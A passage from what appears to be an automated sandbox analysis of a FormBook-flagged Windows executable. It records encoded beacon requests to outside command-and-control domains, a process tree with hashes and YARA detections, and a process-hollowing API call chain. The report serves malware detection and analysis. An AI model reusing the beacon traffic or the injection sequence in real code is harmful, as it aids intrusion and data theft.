                                                                Data Ascii: ghJ5T=GPv4Bxu9kxaEjpeKqqTrLFA0myLW~z6JB0oFCUzvPVSWgnxxt-qbi530OJbMFnipqZqNT3tPQWM-206TJDX2XiIdhEumJMcSrZ02h2m5mXNiZirvC4gTmEUT(HqORko9PNfOlPTUp1jl3lA2t6KtJ690ckXza_OBlBvQV5J1~N0zmfM5oqSJ(YYoZPuTFpfCwugbC4plBY9WTijn1uKSdRGuUwTmYvfeD_JY3KQZJ3fNCmu-jYKCf-RxR6SPdJ4UE4GjS0bhcXAjTFGWSgJOKvP6APAYN-WoxMyiatNvVBXbIorZuhwDV0zJqT5iiE5fm3lo3IzNPA2mh2gpJiCe1NAItYGbGBV8u-SiWnQO3yTlFyrQzWaHgElZnBLyixFJBi4x1A6rQUcjFzpb9BQLDpWnGG6-yMizd6poPdxYQgjDCch9Bn2pYDYn(m4lv97ta_6fB9uU1nsMr98BMDGikrG5z88dlZ4HvudDJS76p7ybRRqDDvMYXq2_gsUYW3cg3qIpbeeXdBeD(TEs5oLJuzGhZtIpqgIOIw4dB0dPvA20lDUbO2EwgVfjaq3JhEDW6Uv-l3ePqnKs8nGfUxxtNFKp84wis6mtKcIFX1XFMF(lxG(TWj85k0SQVMhNBfX7wWEhodHghLkB3RzeU_V66CUsTai-3_YHlsYrMUW1Tqpn3FmplP0MSh0sUMhQrpquanU0tDbY~eJyTFln3u13KORyezJBsDLcp8Ggaph_Z0Oqag8FmnXWTLHO92D6aGIeVpug~xx6FiOzhDpZsV3OR1zXde~Ogr4iXaqc(LVY7vq_S5PDn6y_QR2c4sYUJH(jLSy1xZo46wkCo784KczulemYZ8Ml6F7A9fpxzWHyYKfsGXFf23CRgnwF5ABIrJ1Azz3FcYepobjXDWYSzJ9rpf14fi2EsyCT~mpeS87SNzD4WG0DqlVC2yhBB5wuUG~sf8X5kJ4ZO-J8aLWNTdtUvBFDpZXowZAvhPrw3iysV6rHipXA9tNKOcCJuJXDvAQrNLSza7preWpnHH~zmFJfq3KDIPZm0je0hIrPJSd8x-vAj2PRlmGxQ0cFg57O49ltcC6yb1XQTGWQTRnwmYgwrpRxfhDWYbe-8XeQAEuGA6OpCHG_J6lFSdEA(P~8KyXCDESK14SU5xpnE8qDt8~hNnHRZQ1imMlYNV(TBhDCQ3n_hw4aK51CeOxrTSpi2AudXfm58Ipn6VhnMdjwsgVFU9kQvGukpg83dt7GiZ4l9WMBCwyefJuCAbyYpU0TRFVVf4pX4OihWupZbBS6f_84FJ43ljQcbnG998(bOL1-44taedHB7W~5kBBTpYoi2ST9ZX~edKUhnuPCCWDPge(C0a1GfyX-Nx1ehQy_Z1v25-yYM_eIyu8mYjRfX5AhlhzAia9FlEjNHCmL03kFZPgzLPrSz0O4f7qp9uS0y5M.
                                                                Jan 30, 2023 14:52:29.004182100 CET133INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                6192.168.2.649721164.88.201.21480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:32.123620033 CET134OUTGET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0 HTTP/1.1
                                                                Host: www.sandpiper-apts.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:32.332516909 CET134INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                7192.168.2.64972318.138.206.21380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:37.581681967 CET142OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.tf8dangky.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.tf8dangky.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.tf8dangky.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 6f 57 74 51 5a 43 63 2d 67 70 42 7a 34 58 53 39 47 48 76 4f 65 65 62 4e 55 58 57 38 4d 49 31 50 6f 53 63 46 61 74 75 6e 6d 44 45 70 38 34 7a 6f 69 34 7e 6e 58 44 35 78 71 4e 69 51 72 71 56 51 30 49 4d 79 71 59 59 5f 48 74 28 36 39 39 52 64 33 58 68 30 70 6b 61 67 71 4e 7e 74 6e 38 78 5f 35 6f 68 7a 48 76 6b 58 71 6c 71 35 36 76 71 35 6e 33 31 71 74 75 78 70 4d 43 63 43 56 75 34 75 73 71 56 75 61 6d 46 36 28 45 4a 37 38 77 55 67 65 6e 74 35 6d 6b 46 5a 30 45 39 63 4e 6e 31 4a 36 48 59 41 4e 6d 53 71 62 56 45 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5mkFZ0E9cNn1J6HYANmSqbVE.
                                                                Jan 30, 2023 14:52:37.781827927 CET143INHTTP/1.1 301 Moved Permanently
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:52:37 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Location: https://www.tf8dangky.online/crhz/
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                8192.168.2.64972418.138.206.21380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:40.298743963 CET145OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.tf8dangky.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.tf8dangky.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.tf8dangky.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 79 33 64 51 62 68 6b 2d 6f 70 42 38 30 33 53 39 4e 6e 76 4b 65 65 58 4e 55 57 53 73 50 36 35 50 6f 42 6b 46 55 75 47 6e 6b 44 45 70 7e 34 7a 6b 6d 34 7e 4c 58 44 39 31 71 4d 53 36 72 6f 35 51 32 72 30 79 6f 61 41 38 4e 39 7e 63 71 74 52 65 33 58 68 6c 70 6b 4b 73 71 4e 4b 58 6e 38 70 5f 35 61 4a 7a 57 76 6b 55 6c 46 71 35 36 76 71 39 6e 33 30 7a 74 75 70 50 4d 47 59 53 53 59 55 75 70 36 31 75 63 42 78 39 32 6b 4a 5f 69 41 56 66 4f 79 77 76 38 47 45 64 37 6b 52 37 59 58 30 37 31 32 56 75 4b 48 65 72 5a 44 36 74 63 30 55 4b 56 51 4b 67 78 68 37 38 69 6f 39 36 53 31 52 48 42 56 61 68 70 6d 30 79 36 4b 31 31 4a 65 55 78 37 59 76 48 34 61 74 4b 5a 62 6d 62 62 64 66 4c 6e 6e 64 63 50 6b 35 58 37 32 63 63 43 4b 76 47 28 37 71 62 4f 50 44 70 38 52 51 36 55 53 49 31 59 47 53 2d 7a 46 56 30 43 56 6d 66 67 73 54 59 31 61 71 5f 44 4b 6b 6c 42 6a 54 75 6c 4e 55 51 33 51 34 63 38 76 63 51 41 33 47 71 73 66 46 43 7a 49 47 31 37 56 4f 68 48 4e 73 4f 4b 72 4e 79 76 6c 7e 4b 35 64 4c 63 33 57 66 70 66 6d 35 5a 52 48 28 75 46 72 39 77 38 48 51 69 36 58 4d 41 58 2d 4f 77 49 4a 6d 33 5a 79 67 53 43 6a 49 64 47 63 37 5f 63 52 57 36 78 4c 70 47 47 49 52 4e 61 35 69 51 76 41 73 58 57 65 56 5a 4a 76 71 71 34 75 6c 30 59 34 64 31 74 41 4d 31 30 39 45 33 64 72 68 30 68 53 45 49 51 64 4c 31 36 62 70 36 68 5f 64 61 6c 43 7e 76 47 70 28 6d 6b 6e 37 7a 7e 5a 38 33 4c 47 6e 49 66 55 4b 65 6a 37 46 6e 77 75 5a 4a 44 77 64 47 49 4e 6d 47 72 62 31 6c 57 47 77 49 7e 77 5a 2d 6f 6e 76 54 32 5a 68 53 76 63 48 2d 7a 4c 77 4d 57 6d 62 42 4d 55 36 5a 6b 36 49 36 6e 56 5a 73 36 46 73 4a 76 70 38 6e 64 5f 57 62 37 79 53 73 4c 65 30 74 72 76 39 42 6b 62 32 4f 41 53 5a 57 41 4c 28 49 4d 6f 51 37 66 32 4d 63 69 71 63 37 59 72 7a 71 38 67 78 65 34 46 4a 66 36 76 47 54 41 42 7a 61 57 43 58 44 45 42 6f 36 77 4a 34 58 6e 33 37 6c 56 35 37 49 56 47 67 55 75 37 4a 50 30 51 48 6f 54 6f 32 53 6d 61 35 53 4b 46 74 55 67 38 6e 73 7e 64 62 38 36 2d 70 7a 39 78 7e 51 34 71 58 77 49 78 31 61 67 37 47 4c 68 37 4b 57 47 42 4a 76 4f 31 32 54 39 72 78 77 39 69 41 6e 4d 41 46 35 4f 30 6a 36 71 71 6b 4a 33 6c 4d 2d 44 68 61 71 61 68 41 4e 38 77 72 4f 36 31 77 55 6a 64 37 4f 4b 58 69 70 56 74 35 57 6f 44 43 53 6a 50 51 68 28 79 6e 73 57 4b 67 61 43 67 73 54 78 6f 41 42 53 49 4b 79 4c 72 7a 73 4e 42 66 61 73 65 31 61 57 4c 62 72 6b 34 57 49 62 2d 50 77 67 43 76 71 37 4e 36 48 56 56 41 55 78 51 65 61 5a 49 51 6a 6b 56 68 5f 28 6e 45 32 4b 53 51 75 77 50 38 65 61 53 33 30 37 4f 6c 67 74 75 30 63 67 6f 50 74 30 66 35 44 4d 63 44 74 41 7a 6b 4b 69 58 49 66 6f 63 69 4a 77 39 52 59 56 36 34 6c 57 4c 6b 4b 6a 43 6a 46 61 38 42 6b 33 7a 41 64 43 4e 54 69 52 5a 66 51 50 67 77 32 6f 63 37 31 42 6e 58 4a 38 37 36 53 6f 71 56 31 76 31 38 79 69 30 71 36 76 58 4f 46 76 4f 6b 6f 79 69 44 39 33 78 6a 47 6d 6c 64 39 58 36 4c 67 34 6c 47 43 75 5a 43 54 7a 72 50 76 6e 72 47 49 77 64 39 46 36 39 63 6a 77 30 44 39 36 4b 76 69 31 6a 6c 73 4a 47 77 75 34 74 39 66 55 78 34 57 4d 49 63 55 4c 38 70 46 74 33 7a 69 4d 36 61 49 4e 62 31 74 36 47 49 74 58 7a 28 58 61 4a 32 59 38 38 57 55 4f 61 72 55 42 71 58 6b 59 4a 78 50 76 61 43 7a 43 74 34 61 65 44 49 4e 31 31 6f 31 54 4d 48 47 6c 5f 6f 48 50 2d 41 5f 4d 76 35 33 72 6a 6c 4c 4a 6d 4f 31 39 45 54 5a 69 35 53 6f 4d 61 36 6c 37 77 62 57 73 7a 77 6d 79 37 44 4e 73 2d 52 4a 51 5a 74 30 6d 79 49 63 59 4e 53 61 71 56 49 4e 6f 50 61 7a 77 73 47 58 64 66 7e 67 37 57 67 61 74 4a 7e 72 43 38 4c 4e 6b 30 61 2d 7e 2d 71 30 28 50 4f 53 52 48 77 63 41 4a 33 43 6c 62 6c 36 52 4c 6d 64 37 4e 7e 63 55 34 59 42 30 67 7e 77 54 65 46 53 6c 4d 4b 4b 31 7a 33 63 7a 47 64 41 72 47 36 76 76 43 31 65 52 52 74 75 4b 5a 49 5a 62 4d 79 42 73 5f 6a 75 59 50 4c 38 33 63 6e 63 72 36 74 2d 77 67 32 62 6c 59 4d 32 33 6c 4d 6e 57 39 51 38 41 4c 4b 6c 6a 4c 44 37 75 6c 4d 41 30 48 45 6a 62 74 30 57 51 36 55 6e 31 46 30 75 48 56 6f 4b 74 2d 30 41 75 62 78 56 70 66 53 53 52 69 56 4a 6d 66 59 32 76 6c 67 71 72 39 46 45 31 55 59 6b 6a 50 50 75 45 4a 4c 32 7e 48 67 44 48 4f 7a 4d 41 54 77 69 41 30 31 36 76 66 46 6f 36 50 45 5f 53 6e 48 58 70
                                                                Data Ascii: ghJ5T=1ZNm~q7dG2WPy3dQbhk-opB803S9NnvKeeXNUWSsP65PoBkFUuGnkDEp~4zkm4~LXD91qMS6ro5Q2r0yoaA8N9~cqtRe3XhlpkKsqNKXn8p_5aJzWvkUlFq56vq9n30ztupPMGYSSYUup61ucBx92kJ_iAVfOywv8GEd7kR7YX0712VuKHerZD6tc0UKVQKgxh78io96S1RHBVahpm0y6K11JeUx7YvH4atKZbmbbdfLnndcPk5X72ccCKvG(7qbOPDp8RQ6USI1YGS-zFV0CVmfgsTY1aq_DKklBjTulNUQ3Q4c8vcQA3GqsfFCzIG17VOhHNsOKrNyvl~K5dLc3Wfpfm5ZRH(uFr9w8HQi6XMAX-OwIJm3ZygSCjIdGc7_cRW6xLpGGIRNa5iQvAsXWeVZJvqq4ul0Y4d1tAM109E3drh0hSEIQdL16bp6h_dalC~vGp(mkn7z~Z83LGnIfUKej7FnwuZJDwdGINmGrb1lWGwI~wZ-onvT2ZhSvcH-zLwMWmbBMU6Zk6I6nVZs6FsJvp8nd_Wb7ySsLe0trv9Bkb2OASZWAL(IMoQ7f2Mciqc7Yrzq8gxe4FJf6vGTABzaWCXDEBo6wJ4Xn37lV57IVGgUu7JP0QHoTo2Sma5SKFtUg8ns~db86-pz9x~Q4qXwIx1ag7GLh7KWGBJvO12T9rxw9iAnMAF5O0j6qqkJ3lM-DhaqahAN8wrO61wUjd7OKXipVt5WoDCSjPQh(ynsWKgaCgsTxoABSIKyLrzsNBfase1aWLbrk4WIb-PwgCvq7N6HVVAUxQeaZIQjkVh_(nE2KSQuwP8eaS307Olgtu0cgoPt0f5DMcDtAzkKiXIfociJw9RYV64lWLkKjCjFa8Bk3zAdCNTiRZfQPgw2oc71BnXJ876SoqV1v18yi0q6vXOFvOkoyiD93xjGmld9X6Lg4lGCuZCTzrPvnrGIwd9F69cjw0D96Kvi1jlsJGwu4t9fUx4WMIcUL8pFt3ziM6aINb1t6GItXz(XaJ2Y88WUOarUBqXkYJxPvaCzCt4aeDIN11o1TMHGl_oHP-A_Mv53rjlLJmO19ETZi5SoMa6l7wbWszwmy7DNs-RJQZt0myIcYNSaqVINoPazwsGXdf~g7WgatJ~rC8LNk0a-~-q0(POSRHwcAJ3Clbl6RLmd7N~cU4YB0g~wTeFSlMKK1z3czGdArG6vvC1eRRtuKZIZbMyBs_juYPL83cncr6t-wg2blYM23lMnW9Q8ALKljLD7ulMA0HEjbt0WQ6Un1F0uHVoKt-0AubxVpfSSRiVJmfY2vlgqr9FE1UYkjPPuEJL2~HgDHOzMATwiA016vfFo6PE_SnHXponeiyN5EBiFmi5l3QhZ~gmCZkEp2kPIGvi6rCVb56TrU3j0Hdyw8rbux5qKN18X6l7DBc6Gv4CRz4u77tdanpsnrRg.
                                                                Jan 30, 2023 14:52:40.495204926 CET145INHTTP/1.1 301 Moved Permanently
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:52:40 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Location: https://www.tf8dangky.online/crhz/
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                9192.168.2.64972518.138.206.21380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:43.022285938 CET146OUTGET /crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.tf8dangky.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:43.224649906 CET147INHTTP/1.1 301 Moved Permanently
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:52:43 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Location: https://www.tf8dangky.online/crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:14:51:33
                                                                Start date:30/01/2023
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                Imagebase:0xf20000
                                                                File size:615936 bytes
                                                                MD5 hash:02DF8C86345D056735FA60116B93ED2B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                General

                                                                Target ID:1
                                                                Start time:14:51:34
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                Imagebase:0x270000
                                                                File size:107624 bytes
                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Target ID:2
                                                                Start time:14:51:34
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                Imagebase:0x980000
                                                                File size:107624 bytes
                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                Reputation:moderate

                                                                General

                                                                Target ID:3
                                                                Start time:14:51:36
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff647860000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Target ID:4
                                                                Start time:14:51:46
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                Imagebase:0xd90000
                                                                File size:59904 bytes
                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                Reputation:high

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:14.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:83
                                                                  Total number of Limit Nodes:5
                                                                  execution_graph 3950 1aa87ea 3952 1aa87ef 3950->3952 3951 1aa7ead 3953 1aa8af6 3951->3953 3960 1aa6be8 3951->3960 3964 1aa6be1 3951->3964 3968 1aa6e30 3951->3968 3972 1aa6e29 3951->3972 3952->3951 3976 1aa6f48 3952->3976 3980 1aa6f50 3952->3980 3961 1aa6c2c ResumeThread 3960->3961 3963 1aa6c78 3961->3963 3963->3951 3965 1aa6be8 ResumeThread 3964->3965 3967 1aa6c78 3965->3967 3967->3951 3969 1aa6e74 VirtualAllocEx 3968->3969 3971 1aa6eec 3969->3971 3971->3951 3973 1aa6e30 VirtualAllocEx 3972->3973 3975 1aa6eec 3973->3975 3975->3951 3977 1aa6f50 WriteProcessMemory 3976->3977 3979 1aa7035 3977->3979 3979->3951 3981 1aa6f9c WriteProcessMemory 3980->3981 3983 1aa7035 3981->3983 3983->3951 3991 1aa8a6f 4000 1aa6d00 3991->4000 4004 1aa6d08 3991->4004 3992 1aa8ad0 3993 1aa7ead 3993->3992 3994 1aa6e29 VirtualAllocEx 3993->3994 3995 1aa6e30 VirtualAllocEx 3993->3995 3996 1aa6be8 ResumeThread 3993->3996 3997 1aa6be1 ResumeThread 3993->3997 3994->3993 3995->3993 3996->3993 3997->3993 4001 1aa6d51 SetThreadContext 4000->4001 4003 1aa6dc9 4001->4003 4003->3993 4005 1aa6d51 SetThreadContext 4004->4005 4007 1aa6dc9 4005->4007 4007->3993 4008 1aa7da2 4017 1aa76e0 4008->4017 4021 1aa76d5 4008->4021 4018 1aa7767 4017->4018 4018->4018 4019 1aa7952 CreateProcessA 4018->4019 4020 1aa79bc 4019->4020 4022 1aa7767 4021->4022 4022->4022 4023 1aa7952 CreateProcessA 4022->4023 4024 1aa79bc 4023->4024 4044 1aa8965 4045 1aa896d 4044->4045 4047 1aa6f48 